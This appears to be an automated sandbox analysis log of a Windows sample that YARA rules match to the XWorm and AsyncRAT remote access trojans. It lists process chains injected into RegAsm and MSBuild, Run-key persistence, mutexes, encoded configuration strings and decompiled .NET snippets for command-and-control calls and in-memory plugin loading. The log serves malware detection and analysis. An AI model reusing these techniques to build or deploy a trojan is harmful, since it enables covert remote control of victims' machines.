Source: 4.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.b729c0.4.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 4.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.b729c0.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.9946c0.6.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.9946c0.6.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.b7dc40.0.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 4.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.b7dc40.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.9946c0.2.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.9946c0.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.b7dc40.0.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 4.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.b7dc40.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.2.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.9946c0.4.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.9946c0.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.99f940.0.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.99f940.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.2.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.0.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.0.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.9946c0.7.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.9946c0.7.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000003.00000002.1453808203.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000004.00000003.1030380383.0000000000B73000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000002.00000003.1458491567.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000002.00000003.1458491567.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000002.00000003.1458718699.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000007.00000003.1114239427.0000000000995000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.0.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.0.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.0.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.2.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.2.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.2.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 3.2.RegAsm.exe.7b00000.1.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 3.2.RegAsm.exe.7b00000.1.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 3.2.RegAsm.exe.7c30000.2.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 3.2.RegAsm.exe.7c30000.2.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.b7dc40.0.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.b7dc40.0.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.0.raw.unpack, Settings.cs	Base64 encoded string: 'Sp65M8DLwuq4BU7Gsx3V+X5ZW7m1aTC5Ghy7XdYmQy9tQj9kSKKK9aHO1jeqrA/5', 'or6LqS/zZS8CQvePyg/fgJMe0yqIMkQbW316vPDYq3aqgQsmRjCg7wcG8DY0NOtY'
Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.2.raw.unpack, Settings.cs	Base64 encoded string: 'Sp65M8DLwuq4BU7Gsx3V+X5ZW7m1aTC5Ghy7XdYmQy9tQj9kSKKK9aHO1jeqrA/5', 'or6LqS/zZS8CQvePyg/fgJMe0yqIMkQbW316vPDYq3aqgQsmRjCg7wcG8DY0NOtY'
Source: 4.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.b7dc40.0.raw.unpack, Settings.cs	Base64 encoded string: 'Sp65M8DLwuq4BU7Gsx3V+X5ZW7m1aTC5Ghy7XdYmQy9tQj9kSKKK9aHO1jeqrA/5', 'or6LqS/zZS8CQvePyg/fgJMe0yqIMkQbW316vPDYq3aqgQsmRjCg7wcG8DY0NOtY'
Source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.99f940.0.raw.unpack, Settings.cs	Base64 encoded string: 'Sp65M8DLwuq4BU7Gsx3V+X5ZW7m1aTC5Ghy7XdYmQy9tQj9kSKKK9aHO1jeqrA/5', 'or6LqS/zZS8CQvePyg/fgJMe0yqIMkQbW316vPDYq3aqgQsmRjCg7wcG8DY0NOtY'

Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.2.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.2.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.99f940.0.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.99f940.0.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 4.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.b7dc40.0.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 4.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.b7dc40.0.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.0.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.0.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7576:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\fqBMBb6BGV8IyaV6
Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Mutant created: \Sessions\1\BaseNamedObjects\AutoStartupInstanceMutex

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Process created: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe "C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe"
Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe "C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe"
Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe "C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe"
Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpB64.tmp.bat""
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Process created: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe "C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 3	Jump to behavior

Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.2.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.2.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 4.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.b7dc40.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 4.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.b7dc40.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.99f940.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.99f940.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)

Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.0.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.0.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.0.raw.unpack, Messages.cs	.Net Code: Memory
Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.2.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.2.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.2.raw.unpack, Messages.cs	.Net Code: Memory
Source: 4.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.b7dc40.0.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 4.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.b7dc40.0.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 4.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.b7dc40.0.raw.unpack, Messages.cs	.Net Code: Memory
Source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.99f940.0.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.99f940.0.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.99f940.0.raw.unpack, Messages.cs	.Net Code: Memory

Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Static PE information: section name: .fptable
Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.0.dr	Static PE information: section name: .fptable

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Code function: 0_2_002D54DD push ecx; ret	0_2_002D54F0
Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Code function: 2_2_00CD54DD push ecx; ret	2_2_00CD54F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_053179B0 pushfd ; ret	3_2_053179B9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0674E6E0 push eax; retf	3_2_0674E6E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0674E6EA push eax; retf	3_2_0674E6E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0674CDE8 push esp; ret	3_2_0674CDE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0674CDD4 push esp; ret	3_2_0674CDDD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_07B28960 pushad ; iretd	3_2_07B28981
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_07BF4F05 push FFFFFF8Bh; iretd	3_2_07BF4F07

Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AutoStartApp			Jump to behavior
Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AutoStartApp			Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
